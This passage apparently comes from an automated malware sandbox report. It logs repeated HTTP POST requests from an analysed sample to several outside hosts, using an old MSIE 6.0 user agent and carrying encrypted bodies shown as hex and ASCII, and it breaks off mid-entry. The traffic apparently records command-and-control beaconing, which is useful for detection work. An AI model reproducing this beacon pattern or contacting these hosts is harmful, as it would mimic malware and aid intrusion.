+pYVLcIFmI2upQZ9tYpkj0WsLRPSjNNtFgD4lRY9AwcFBnmd1sM8Ewr9BJAbqsqhs+UShmeCDur/WWhQXR45mypq3iUlIUDWUqTlD2HPN/Ln+SDYj6U3wIUr/1mOIahptQZtITm1GRIfLDkS3VMai0F5C1tFdLFSvNc+WaLswwz7/7ME8kngjOBsTkcvMHm5AQ/bvzVOzYz7sOSjmzTNWj0/KVKme1KK84bBJBgorVCtFmawaDJdBr0Cipp/wBEcC6pP48KEusbFIrjxr7iiGyA8hkq82HgFKk85+KJRmA69BPRJsT7UkDwQIfCGZ2cmpSf8Ql5rAGO3e4u747jmy+gEH9TNeuccnKotlfX3VCZCa4uVHQyVI0gJrEVjnXyonVUUpMyiEfQdRUaq/v2IEephIJSc1zyhgESHMHtje43AyFvZAy47I2QehOquVxQqr721YGT0buePcxWAWuezSGG+4wEtXlbQYfQfHefPgRNYau0sgUipL4TwIFrOEfaUSa25ORCw/mQ9IVKyOezGhgwEzWZdAzI1WPEMZwy4Kgqg8i7dTRU/lz1+0+s9
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 39 41 38 78 46 69 55 34 73 49 31 43 6c 32 2b 6e 7a 49 74 64 49 4a 36 48 36 72 39 7a 66 68 78 35 4b 53 66 76 78 4e 57 33 46 68 4d 56 43 62 55 45 71 6a 6b 43 50 56 33 43 4a 6d 67 37 67 44 59 64 4d 4e 4c 6c 64 6f 73 59 35 7a 69 50 78 2b 4e 5a 6b 6d 58 65 67 31 6e 38 5a 2f 36 50 38 6e 48 6f 71 52 48 2f 54 79 52 56 4a 7a 6d 77 7a 45 7a 61 63 4c 41 31 2f 76 7a 6b 63 63 6c 56 6d 41 6f 30 79 2b 6b 56 51 42 68 5a 39 66 4f 4b 6a 5a 32 65 30 2b 62 68 79 54 7a 52 52 4a 30 5a 4a 51 37 30 76 52 70 55 2f 32 54 4b 4f 32 64 46 7a 45 38 73 79 41 38 44 72 4f 71 59 51 63 51 74 48 33 71 4d 49 4d 39 77 46 6c 79 46 36 51 6d 4a 72 54 5a 38 47 30 6b 4a 6c 66 35 57 61 41 44 67 61 71 61 6b 76 56 46 57 48 73 39 53 31 42 76 38 78 6e 57 42 68 6b 75 72 56 68 6d 78 46 53 57 57 64 76 56 49 34 43 6a 67 42 30 44 54 67 4e 37 6f 4b 77 63 63 6e 73 4e 34 2b 33 45 58 58 33 74 7a 67 32 45 38 67 54 77 66 2b 59 68 45 62 46 49 34 77 56 6e 42 33 4f 75 46 59 54 64 6f 67 47 4d 61 46 2b 41 68 30 32 72 52 77 6c 44 41 63 70 72 67 38 66 2b 4a 48 69 72 56 7a 4c 7a 6b 75 58 6d 50 55 7a 6f 65 73 53 77 41 32 39 39 4e 48 79 37 63 4b 54 77 46 61 30 67 69 48 46 73 68 57 6c 34 68 4a 70 73 30 59 6b 7a 33 5a 46 2f 73 4c 45 78 47 42 54 4c 44 58 4e 73 58 6a 58 63 6a 58 4e 4d 30 33 76 59 46 79 47 54 71 68 5a 53 70 47 68 6d 46 64 73 32 76 58 45 4e 47 33 76 54 41 6b 32 72 2b 32 42 57 6b 4f 4b 73 75 51 72 4d 4c 56 49 43 47 64 4e 4a 75 35 65 50 59 66 58 66 2b 6e 51 68 6c 58 6a 61 73 4e 63 58 30 66 61 6e 66 65 31 39 4f 4c 6f 42 59 32 63 32 6d 38 39 76 2b 41 6e 65 53 46 7a 37 4c 70 43 64 30 55 48 76 73 78 41 52 50 64 42 57 77 46 45 36 50 74 75 4a 73 7a 75 67 78 4d 77 4c 41 76 6d 46 70 54 4f 45 2b 4e 6c 74 74 62 48 64 30 6e 36 63 4d Data Ascii: 9A8xFiU4sI1Cl2+nzItdIJ6H6r9zfhx5KSfvxNW3FhMVCbUEqjkCPV3CJmg7gDYdMNLldosY5ziPx+NZkmXeg1n8Z/6P8nHoqRH/TyRVJzmwzEzacLA1/vzkcclVmAo0y+kVQBhZ9fOKjZ2e0+bhyTzRRJ0ZJQ70vRpU/2TKO2dFzE8syA8DrOqYQcQtH3qMIM9wFlyF6QmJrTZ8G0kJlf5WaADgaqakvVFWHs9S1Bv8xnWBhkurVhmxFSWWdvVI4CjgB0DTgN7oKwccnsN4+3EXX3tzg2E8gTwf+YhEbFI4wVnB3OuFYTdogGMaF+Ah02rRwlDAcprg8f+JHirVzLzkuXmPUzoesSwA299NHy7cKTwFa0giHFshWl4hJps0Ykz3ZF/sLExGBTLDXNsXjXcjXNM03vYFyGTqhZSpGhmFds2vXENG3vTAk2r+2BWkOKsuQrMLVICGdNJu5ePYfXf+nQhlXjasNcX0fanfe19OLoBY2c2m89v+AneSFz7LpCd0UHvsxARPdBWwFE6PtuJszugxMwLAvmFpTOE+NlttbHd0n6cM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheCookie: __cf_bm=bG7aGS9BVVg0sRmxAgVEHshxh_IUaylULZnnrKAZthw-1688537177-0-Ad2ypDuBBLd93obDicSBXDOOQyPU7Psl9Aylem5rntUccmgjEu7zZ4vGUse61szb3qyCxcMNQXOXcHQ8/uNp0b0=Data Raw: 63 4c 52 66 2f 56 51 4b 77 49 31 31 54 5a 61 62 4c 2f 47 41 39 61 63 6f 4c 61 33 4d 4b 65 34 77 79 46 7a 45 45 78 36 33 62 76 76 77 39 30 4b 37 44 44 51 35 50 7a 6c 31 5a 6e 75 75 43 69 4b 49 6e 75 37 78 31 4a 56 6a 59 6b 32 52 4d 77 6e 4a 73 6f 56 48 55 71 69 56 38 74 78 48 31 6c 36 70 77 54 6d 64 66 44 35 7a 53 31 2f 4c 57 55 52 47 6c 64 4a 35 75 47 6e 6b 62 63 62 52 2b 39 7a 71 75 73 65 52 45 76 48 4c 4f 47 50 6f 36 46 78 63 72 49 61 4b 43 36 66 2b 78 41 65 6c 5a 50 76 48 4b 73 6d 54 75 73 46 4b 49 4e 51 63 48 48 6b 67 56 30 72 72 61 42 77 33 77 4c 73 4b 42 72 43 31 4e 59 79 5a 63 67 43 51 55 34 55 46 67 2f 75 6d 62 74 45 52 5a 47 44 4c 50 6e 57 2f 5a 78 51 75 4d 44 4c 55 4b 77 56 62 6b 7a 77 34 41 68 50 74 41 55 6d 61 4a 38 58 33 51 67 30 69 38 47 58 4e 6d 31 39 52 52 64 4c 4f 39 47 48 49 64 4a 39 2f 4c 4d 6c 43 6c 42 71 6d 6d 37 31 4f 44 70 69 7a 50 68 75 6c 36 4a 34 2f 77 50 33 71 50 70 31 75 41 2f 45 62 32 73 41 45 45 61 50 68 5a 6a 52 39 2b 69 6f 56 53 6a 61 37 69 78 57 79 61 66 34 79 6d 47 2f 74 72 6a 73 67 67 59 55 67 56 2f 2f 44 39 59 72 4d 2b 58 32 62 42 6a 31 43 44 61 45 58 66 57 56 62 53 66 2b 4e 5a 33 48 57 2b 39 70 58 63 35 65 36 64 32 6f 6d 72 32 41 64 72 6d 6e 56 78 35 57 61 76 74 6c 75 31 67 42 32 5a 70 47 4e 6e 42 72 4b 47 69 56 65 53 46 47 44 35 56 69 58 6c 6e 55 32 74 30 32 58 53 4d 69 49 63 38 58 62 32 76 31 35 55 4e 4b 32 45 78 6d 61 44 67 2f 55 6f 72 6e 48 2b 52 78 65 6b 68 32 6b 5a 6e 36 63 59 31 55 2b 6b 6c 77 73 5a 61 6c 6e 4c 6b 38 2f 45 42 58 48 36 62 36 57 2f 4b 44 77 66 42 74 73 41 42 38 6e 68 4e 53 52 61 36 74 2b 6f 4a 49 3d Data Ascii: cLRf/VQKwI11TZabL/GA9acoLa3MKe4wyFzEEx63bvvw90K7DDQ5Pzl1ZnuuCiKInu7x1JVjYk2RMwnJsoVHUqiV8txH1l6pwTmdfD5zS1/LWURGldJ5uGnkbcbR+9zquseREvHLOGPo6FxcrIaKC6f+xAelZPvHKsmTusFKINQcHHkgV0rraBw3wLsKBrC1NYyZcgCQU4UFg/umbtERZGDLPnW/ZxQuMDLUKwVbkzw4AhPtAUmaJ8X3Qg0i8GXNm19RRdLO9GHIdJ9/LMlClBqmm71ODpizPhul6J4/wP3qPp1uA/Eb2sAEEaPhZjR9+ioVSja7ixWyaf4ymG/trjsggYUgV//D9YrM+X2bBj1CDaEXfWVbSf+NZ3HW+9pXc5e6d2omr2AdrmnVx5Wavtlu1gB2ZpGNnBrKGiVeSFGD5ViXlnU2t02XSMiIc8Xb2v15UNK2ExmaDg/UornH+Rxekh2kZn6cY1U+klwsZalnLk8/EBXH6b6W/KDwfBtsAB8nhNSRa6t+oJI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 76 2b 71 5a 35 4a 2b 4d 78 34 32 71 6d 4d 36 48 2f 6e 45 66 72 53 67 67 58 61 4a 31 62 63 66 73 51 39 59 4b 46 36 46 64 78 4c 63 59 50 76 6f 58 75 75 63 52 35 41 56 38 33 66 41 51 70 6a 6e 4f 37 53 79 62 6d 67 63 2b 32 4e 36 33 33 73 52 53 59 70 38 63 65 59 49 4a 37 47 43 4b 62 35 42 4a 74 45 71 6f 7a 71 6a 36 6d 46 5a 62 62 7a 4b 42 6e 71 54 75 4a 4f 6c 5a 76 4e 68 77 63 76 6d 5a 46 32 70 73 46 62 30 66 49 7a 62 50 5a 43 37 39 2f 63 67 6c 41 61 45 35 55 47 42 67 69 46 58 78 6b 70 62 59 61 31 69 4b 66 56 39 44 70 31 6b 57 71 30 47 4f 6d 68 71 79 54 4e 4d 43 34 4d 74 45 67 32 49 72 68 66 4e 54 72 67 39 7a 36 55 35 6f 59 4b 31 48 62 54 56 44 4f 5a 73 4e 47 70 65 2b 38 39 63 53 46 6f 4d 39 2f 76 54 67 58 35 66 55 33 34 70 32 76 39 30 65 34 66 6a 44 59 58 6b 54 6b 71 39 75 31 6e 53 75 31 65 73 4c 75 52 6b 4d 31 67 6b 55 76 35 7a 69 4c 36 73 6f 36 38 33 73 66 69 42 54 54 41 33 57 51 6c 44 78 2f 7a 75 4c 6d 4a 4c 4e 69 41 74 4f 37 69 32 6c 62 73 6c 53 55 43 45 59 47 35 55 55 4e 4a 6d 4e 34 37 72 48 2f 2f 4e 42 37 61 70 56 47 54 46 42 6b 69 4c 37 54 32 33 6e 53 38 79 36 57 57 61 51 64 52 7a 58 72 6f 58 6b 31 37 65 44 6f 47 49 43 69 78 6a 4d 31 37 67 38 6b 75 42 6b 54 76 34 37 5a 43 6d 41 32 68 44 44 74 57 50 6a 42 6e 4a 30 62 6e 2b 35 4e 76 72 4c 6c 70 65 4a 34 33 6e 62 31 56 50 7a 2b 34 52 6a 6f 41 50 58 41 33 6d 46 2f 37 73 55 75 48 57 63 79 50 6c 32 66 71 57 35 2b 62 68 36 6e 45 6a 61 73 6c 4b 30 43 61 48 34 6c 43 46 74 62 77 50 2f 4a 42 36 34 42 34 73 65 56 42 6a 51 34 4c 73 66 69 66 37 7a 6b 64 38 59 36 6e 48 2f 49 44 41 58 57 4c 4b 33 62 6a 30 4a 2f 43 44 39 6a 68 38 4b 58 7a 59 36 44 33 34 59 61 52 36 46 33 62 33 48 2b 50 45 30 51 64 51 38 72 37 42 78 47 75 57 45 72 37 74 36 38 38 30 36 Data Ascii: v+qZ5J+Mx42qmM6H/nEfrSggXaJ1bcfsQ9YKF6FdxLcYPvoXuucR5AV83fAQpjnO7Sybmgc+2N633sRSYp8ceYIJ7GCKb5BJtEqozqj6mFZbbzKBnqTuJOlZvNhwcvmZF2psFb0fIzbPZC79/cglAaE5UGBgiFXxkpbYa1iKfV9Dp1kWq0GOmhqyTNMC4MtEg2IrhfNTrg9z6U5oYK1HbTVDOZsNGpe+89cSFoM9/vTgX5fU34p2v90e4fjDYXkTkq9u1nSu1esLuRkM1gkUv5ziL6so683sfiBTTA3WQlDx/zuLmJLNiAtO7i2lbslSUCEYG5UUNJmN47rH//NB7apVGTFBkiL7T23nS8y6WWaQdRzXroXk17eDoGICixjM17g8kuBkTv47ZCmA2hDDtWPjBnJ0bn+5NvrLlpeJ43nb1VPz+4RjoAPXA3mF/7sUuHWcyPl2fqW5+bh6nEjaslK0CaH4lCFtbwP/JB64B4seVBjQ4Lsfif7zkd8Y6nH/IDAXWLK3bj0J/CD9jh8KXzY6D34YaR6F3b3H+PE0QdQ8r7BxGuWEr7t68806
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 47 4f 4c 2f 59 4d 57 57 79 34 31 55 65 73 6b 67 37 42 6b 56 52 7a 35 2f 2f 62 71 54 41 56 7a 32 79 64 39 79 34 43 47 59 49 69 6f 75 54 34 62 6e 2f 6d 71 5a 36 35 71 61 41 36 4e 37 72 46 30 61 75 52 4b 67 67 48 4a 64 49 57 61 4c 54 76 6e 56 59 43 56 33 30 58 56 43 36 43 78 71 36 79 79 6c 42 74 57 74 71 2b 77 47 50 4a 2f 65 6c 55 6d 77 42 6a 42 70 50 57 58 64 4a 48 67 2b 42 71 41 6c 43 46 52 79 56 77 63 76 58 58 41 74 44 66 4e 35 44 34 31 32 5a 4a 66 2f 42 66 73 2b 4c 31 62 48 47 66 47 4a 73 75 74 38 75 77 30 49 6f 49 6e 31 6d 6e 31 50 2f 6d 32 55 4e 68 49 58 31 39 72 42 70 6c 75 43 6b 55 42 6c 7a 4e 37 6d 51 43 44 34 73 66 6f 36 50 4c 43 6d 34 73 4e 74 63 4c 65 79 53 53 33 66 6c 73 34 47 4a 37 42 58 37 7a 44 49 34 72 4d 4a 76 6d 71 6c 43 41 4e 39 2b 43 54 55 2f 51 4c 38 4d 72 79 51 72 4b 34 5a 6f 76 65 30 4b 58 54 57 76 74 6c 53 75 2f 77 52 56 6f 72 30 44 70 53 2f 47 5a 6b 36 35 72 6d 32 47 6b 4b 74 34 6a 74 71 65 41 48 52 34 73 5a 54 6d 74 79 57 70 52 2b 45 50 6e 5a 38 63 33 34 38 45 55 2f 70 6f 63 4d 51 52 43 53 68 4b 70 54 33 53 59 51 6c 57 46 63 47 42 30 72 6e 78 6f 62 66 4c 31 61 6f 6e 62 6b 48 4f 59 68 67 70 43 52 30 76 61 48 55 44 64 76 4c 53 64 75 73 75 49 78 49 44 4a 43 33 2b 44 74 71 77 35 43 47 42 78 2b 7a 44 43 6f 49 4a 30 6a 5a 44 30 71 62 53 6f 52 76 48 53 79 39 43 6c 67 4b 69 74 67 44 51 75 31 45 4b 36 45 53 74 54 78 55 69 34 7a 74 78 68 37 30 47 39 37 6b 49 78 49 74 4f 31 4b 4d 69 34 4c 4f 71 49 75 79 53 4f 30 55 68 52 4f 41 34 51 55 47 72 6d 36 36 39 71 51 79 36 69 4d 33 5a 74 34 2b 61 2f 52 76 6b 71 5a 38 33 6e 63 48 63 52 63 4e 55 43 79 6f 7a 67 78 62 4d 38 4e 49 35 5a 66 65 42 53 6f 2b 34 47 67 6c Data Ascii: GOL/YMWWy41Ueskg7BkVRz5//bqTAVz2yd9y4CGYIiouT4bn/mqZ65qaA6N7rF0auRKggHJdIWaLTvnVYCV30XVC6Cxq6yylBtWtq+wGPJ/elUmwBjBpPWXdJHg+BqAlCFRyVwcvXXAtDfN5D412ZJf/Bfs+L1bHGfGJsut8uw0IoIn1mn1P/m2UNhIX19rBpluCkUBlzN7mQCD4sfo6PLCm4sNtcLeySS3fls4GJ7BX7zDI4rMJvmqlCAN9+CTU/QL8MryQrK4Zove0KXTWvtlSu/wRVor0DpS/GZk65rm2GkKt4jtqeAHR4sZTmtyWpR+EPnZ8c348EU/pocMQRCShKpT3SYQlWFcGB0rnxobfL1aonbkHOYhgpCR0vaHUDdvLSdusuIxIDJC3+Dtqw5CGBx+zDCoIJ0jZD0qbSoRvHSy9ClgKitgDQu1EK6EStTxUi4ztxh70G97kIxItO1KMi4LOqIuySO0UhROA4QUGrm669qQy6iM3Zt4+a/RvkqZ83ncHcRcNUCyozgxbM8NI5ZfeBSo+4Ggl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 76 2b 71 5a 35 4a 2b 4d 78 34 32 71 6d 4d 36 48 2f 6e 45 66 72 53 67 67 58 61 4a 31 62 63 66 73 51 39 59 4b 46 36 46 64 78 4c 63 59 50 76 6f 58 75 75 63 52 35 41 56 38 33 66 41 51 70 6a 6e 4f 37 53 79 62 6d 67 63 2b 32 4e 36 33 33 73 52 53 59 70 38 63 65 59 49 4a 37 47 43 4b 62 35 42 4a 74 45 71 6f 7a 71 6a 36 6d 46 5a 62 62 7a 4b 42 6e 71 54 75 4a 4f 6c 5a 76 4e 68 77 63 76 6d 5a 46 32 70 73 46 62 30 66 49 7a 62 50 5a 43 37 39 2f 63 67 6c 41 61 45 35 55 47 42 67 69 46 58 78 6b 70 62 59 61 31 69 4b 66 56 39 44 70 31 6b 57 71 30 47 4f 6d 68 71 79 54 4e 4d 43 34 4d 74 45 67 32 49 72 68 66 4e 54 72 67 39 7a 36 55 35 6f 59 4b 31 48 62 54 56 44 4f 5a 73 4e 47 70 65 2b 38 39 63 53 46 6f 4d 39 2f 76 54 67 58 35 66 55 33 34 70 32 76 39 30 65 34 66 6a 44 59 58 6b 54 6b 71 39 75 31 6e 53 75 31 65 73 4c 75 52 6b 4d 31 67 6b 55 76 35 7a 69 4c 36 73 6f 36 38 33 73 66 69 42 54 54 41 33 57 51 6c 44 78 2f 7a 75 4c 6d 4a 4c 4e 69 41 74 4f 37 69 32 6c 62 73 6c 53 55 43 45 59 47 35 55 55 4e 4a 6d 4e 34 37 72 48 2f 2f 4e 42 37 61 70 56 47 54 46 42 6b 69 4c 37 54 32 33 6e 53 38 79 36 57 57 61 51 64 52 7a 58 72 6f 58 6b 31 37 65 44 6f 47 49 43 69 78 6a 4d 31 37 67 38 6b 75 42 6b 54 76 34 37 5a 43 6d 41 32 68 44 44 74 57 50 6a 42 6e 4a 30 62 6e 2b 35 4e 76 72 4c 6c 70 65 4a 34 33 6e 62 31 56 50 7a 2b 34 52 6a 6f 41 50 58 41 33 6d 46 2f 37 73 55 75 48 57 63 79 50 6c 32 66 71 57 35 2b 62 68 36 6e 45 6a 61 73 6c 4b 30 43 61 48 34 6c 43 46 74 62 77 50 2f 4a 42 36 34 42 34 73 65 56 42 6a 51 34 4c 73 66 69 66 37 7a 6b 64 38 59 36 6e 48 2f 49 44 41 58 57 4c 4b 33 62 6a 30 4a 2f 43 44 39 6a 68 38 4b 58 7a 59 36 44 33 34 59 61 52 36 46 33 62 33 48 2b 50 45 30 51 64 51 38 72 37 42 78 47 75 57 45 72 37 74 36 38 38 30 36 Data Ascii: v+qZ5J+Mx42qmM6H/nEfrSggXaJ1bcfsQ9YKF6FdxLcYPvoXuucR5AV83fAQpjnO7Sybmgc+2N633sRSYp8ceYIJ7GCKb5BJtEqozqj6mFZbbzKBnqTuJOlZvNhwcvmZF2psFb0fIzbPZC79/cglAaE5UGBgiFXxkpbYa1iKfV9Dp1kWq0GOmhqyTNMC4MtEg2IrhfNTrg9z6U5oYK1HbTVDOZsNGpe+89cSFoM9/vTgX5fU34p2v90e4fjDYXkTkq9u1nSu1esLuRkM1gkUv5ziL6so683sfiBTTA3WQlDx/zuLmJLNiAtO7i2lbslSUCEYG5UUNJmN47rH//NB7apVGTFBkiL7T23nS8y6WWaQdRzXroXk17eDoGICixjM17g8kuBkTv47ZCmA2hDDtWPjBnJ0bn+5NvrLlpeJ43nb1VPz+4RjoAPXA3mF/7sUuHWcyPl2fqW5+bh6nEjaslK0CaH4lCFtbwP/JB64B4seVBjQ4Lsfif7zkd8Y6nH/IDAXWLK3bj0J/CD9jh8KXzY6D34YaR6F3b3H+PE0QdQ8r7BxGuWEr7t68806
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 47 4f 4c 2f 59 4d 57 57 79 34 31 55 65 73 6b 67 37 42 6b 56 52 7a 35 2f 2f 62 71 54 41 56 7a 32 79 64 39 79 34 43 47 59 49 69 6f 75 54 34 62 6e 2f 6d 71 5a 36 35 71 61 41 36 4e 37 72 46 30 61 75 52 4b 67 67 48 4a 64 49 57 61 4c 54 76 6e 56 59 43 56 33 30 58 56 43 36 43 78 71 36 79 79 6c 42 74 57 74 71 2b 77 47 50 4a 2f 65 6c 55 6d 77 42 6a 42 70 50 57 58 64 4a 48 67 2b 42 71 41 6c 43 46 52 79 56 77 63 76 58 58 41 74 44 66 4e 35 44 34 31 32 5a 4a 66 2f 42 66 73 2b 4c 31 62 48 47 66 47 4a 73 75 74 38 75 77 30 49 6f 49 6e 31 6d 6e 31 50 2f 6d 32 55 4e 68 49 58 31 39 72 42 70 6c 75 43 6b 55 42 6c 7a 4e 37 6d 51 43 44 34 73 66 6f 36 50 4c 43 6d 34 73 4e 74 63 4c 65 79 53 53 33 66 6c 73 34 47 4a 37 42 58 37 7a 44 49 34 72 4d 4a 76 6d 71 6c 43 41 4e 39 2b 43 54 55 2f 51 4c 38 4d 72 79 51 72 4b 34 5a 6f 76 65 30 4b 58 54 57 76 74 6c 53 75 2f 77 52 56 6f 72 30 44 70 53 2f 47 5a 6b 36 35 72 6d 32 47 6b 4b 74 34 6a 74 71 65 41 48 52 34 73 5a 54 6d 74 79 57 70 52 2b 45 50 6e 5a 38 63 33 34 38 45 55 2f 70 6f 63 4d 51 52 43 53 68 4b 70 54 33 53 59 51 6c 57 46 63 47 42 30 72 6e 78 6f 62 66 4c 31 61 6f 6e 62 6b 48 4f 59 68 67 70 43 52 30 76 61 48 55 44 64 76 4c 53 64 75 73 75 49 78 49 44 4a 43 33 2b 44 74 71 77 35 43 47 42 78 2b 7a 44 43 6f 49 4a 30 6a 5a 44 30 71 62 53 6f 52 76 48 53 79 39 43 6c 67 4b 69 74 67 44 51 75 31 45 4b 36 45 53 74 54 78 55 69 34 7a 74 78 68 37 30 47 39 37 6b 49 78 49 74 4f 31 4b 4d 69 34 4c 4f 71 49 75 79 53 4f 30 55 68 52 4f 41 34 51 55 47 72 6d 36 36 39 71 51 79 36 69 4d 33 5a 74 34 2b 61 2f 52 76 6b 71 5a 38 33 6e 63 48 63 52 63 4e 55 43 79 6f 7a 67 78 62 4d 38 4e 49 35 5a 66 65 42 53 6f 2b 34 47 67 6c Data Ascii: GOL/YMWWy41Ueskg7BkVRz5//bqTAVz2yd9y4CGYIiouT4bn/mqZ65qaA6N7rF0auRKggHJdIWaLTvnVYCV30XVC6Cxq6yylBtWtq+wGPJ/elUmwBjBpPWXdJHg+BqAlCFRyVwcvXXAtDfN5D412ZJf/Bfs+L1bHGfGJsut8uw0IoIn1mn1P/m2UNhIX19rBpluCkUBlzN7mQCD4sfo6PLCm4sNtcLeySS3fls4GJ7BX7zDI4rMJvmqlCAN9+CTU/QL8MryQrK4Zove0KXTWvtlSu/wRVor0DpS/GZk65rm2GkKt4jtqeAHR4sZTmtyWpR+EPnZ8c348EU/pocMQRCShKpT3SYQlWFcGB0rnxobfL1aonbkHOYhgpCR0vaHUDdvLSdusuIxIDJC3+Dtqw5CGBx+zDCoIJ0jZD0qbSoRvHSy9ClgKitgDQu1EK6EStTxUi4ztxh70G97kIxItO1KMi4LOqIuySO0UhROA4QUGrm669qQy6iM3Zt4+a/RvkqZ83ncHcRcNUCyozgxbM8NI5ZfeBSo+4Ggl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 54 4b 71 38 2b 73 48 57 58 31 55 79 52 46 74 6c 6f 4d 47 32 75 70 70 49 2b 6d 55 2f 46 77 46 74 68 62 6c 44 79 7a 6f 55 70 49 70 79 70 34 30 31 6b 6e 36 75 77 66 33 70 46 79 65 44 48 30 46 6b 77 7a 6b 53 53 5a 42 46 62 59 53 6d 52 4c 71 57 4e 77 79 67 4a 34 4a 31 58 57 6c 59 41 63 59 7a 39 5a 5a 69 42 77 30 69 65 31 78 6f 62 48 68 31 58 35 6d 70 4d 7a 61 6a 69 63 42 6a 35 33 38 67 44 49 45 56 56 50 2f 71 51 37 38 61 34 51 71 48 43 69 42 65 6c 63 2f 2b 67 55 53 63 57 58 75 64 38 72 30 75 41 61 30 75 37 44 5a 55 38 30 45 6e 79 56 45 71 4d 4d 59 39 77 66 4e 70 6e 46 4f 52 65 77 39 35 6e 6d 61 56 6e 67 64 4a 63 56 79 78 42 51 77 57 65 30 72 4c 42 2b 31 72 4c 62 48 78 35 44 6d 52 62 2f 79 5a 57 38 72 4e 37 32 38 67 73 70 6a 36 56 6e 4b 66 35 7a 48 69 55 41 66 31 69 59 61 35 73 73 47 58 2f 62 6b 79 66 2b 52 56 52 76 78 54 34 59 72 46 4d 7a 57 74 46 2b 31 35 6f 6f 63 4c 54 2b 6b 47 44 45 45 52 4f 7a 65 59 76 2b 2b 30 33 79 4a 56 4c 7a 34 63 6a 4a 72 53 6d 58 2f 4f 63 43 46 79 5a 79 7a 36 61 71 39 69 70 34 70 46 36 4c 7a 31 69 77 37 75 68 5a 58 75 73 55 72 68 4a 62 44 4e 66 61 69 31 65 7a 77 33 54 73 65 6b 53 56 77 4d 48 66 41 65 6b 39 47 4a 6e 35 49 6e 4c 61 6f 59 49 73 34 59 78 7a 39 4f 54 61 59 55 71 30 36 62 45 62 4a 46 56 76 4e 57 31 63 65 73 6c 54 39 63 75 4d 34 4f 66 7a 54 70 38 36 44 4d 63 6e 4c 49 4e 75 43 66 4d 71 2f 6b 54 52 76 6d 2b 41 51 32 34 67 76 56 6c 6a 6c 77 35 6e 6a 5a 38 4e 31 73 56 75 64 38 4d 55 42 4a 70 54 71 5a 61 48 69 73 54 54 5a 42 78 62 6e 30 37 6a 42 45 62 39 6e 4a 6d 75 53 70 76 77 6f 42 49 42 63 64 4a 44 45 62 4f 4a 79 33 39 64 31 41 30 37 44 4c 31 56 32 69 5a 39 2b 78 46 4c 77 74 4d 73 54 43 47 4c 41 2b 7a 48 74 4b 44 6e 6b 45 76 39 39 34 52 67 41 59 64 69 54 62 4e 41 6f 3d Data Ascii: TKq8+sHWX1UyRFtloMG2uppI+mU/FwFthblDyzoUpIpyp401kn6uwf3pFyeDH0FkwzkSSZBFbYSmRLqWNwygJ4J1XWlYAcYz9ZZiBw0ie1xobHh1X5mpMzajicBj538gDIEVVP/qQ78a4QqHCiBelc/+gUScWXud8r0uAa0u7DZU80EnyVEqMMY9wfNpnFORew95nmaVngdJcVyxBQwWe0rLB+1rLbHx5DmRb/yZW8rN728gspj6VnKf5zHiUAf1iYa5ssGX/bkyf+RVRvxT4YrFMzWtF+15oocLT+kGDEEROzeYv++03yJVLz4cjJrSmX/OcCFyZyz6aq9ip4pF6Lz1iw7uhZXusUrhJbDNfai1ezw3TsekSVwMHfAek9GJn5InLaoYIs4Yxz9OTaYUq06bEbJFVvNW1ceslT9cuM4OfzTp86DMcnLINuCfMq/kTRvm+AQ24gvVljlw5njZ8N1sVud8MUBJpTqZaHisTTZBxbn07jBEb9nJmuSpvwoBIBcdJDEbOJy39d1A07DL1V2iZ9+xFLwtMsTCGLA+zHtKDnkEv994RgAYdiTbNAo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 36 6c 50 31 79 39 6c 52 58 6c 58 45 42 39 79 50 36 4a 45 47 4a 58 49 76 64 75 34 33 66 4d 62 65 48 64 72 52 63 58 61 58 65 4f 44 7a 31 31 78 4f 6f 77 48 47 64 66 74 33 67 4b 66 5a 57 77 37 69 39 76 64 6f 4a 43 77 37 76 74 78 4f 72 6d 6d 4d 53 37 44 76 6a 74 75 4f 42 4a 34 2b 55 4c 53 66 58 6d 64 6b 53 6d 79 64 32 42 65 6c 78 6b 2b 51 79 58 79 54 68 68 6d 32 2b 52 67 45 41 31 79 77 68 2f 34 37 53 69 34 42 57 78 37 46 37 47 49 42 4b 4a 4a 75 4b 6d 71 72 64 2b 55 47 5a 70 50 2b 53 55 6b 70 53 5a 6a 56 73 5a 5a 6a 54 72 4a 44 42 58 62 55 79 50 42 6f 4a 58 55 63 70 2f 64 4b 57 57 56 6a 69 50 65 54 66 70 6c 67 44 75 53 30 36 6e 52 49 56 4c 4c 61 75 66 77 52 47 6b 32 71 65 2b 72 78 4d 48 6c 52 4c 62 76 35 53 37 68 31 39 56 30 56 34 54 6d 45 55 54 56 30 72 67 69 79 4c 46 56 53 66 38 65 55 6d 76 6b 54 78 69 62 79 68 70 54 42 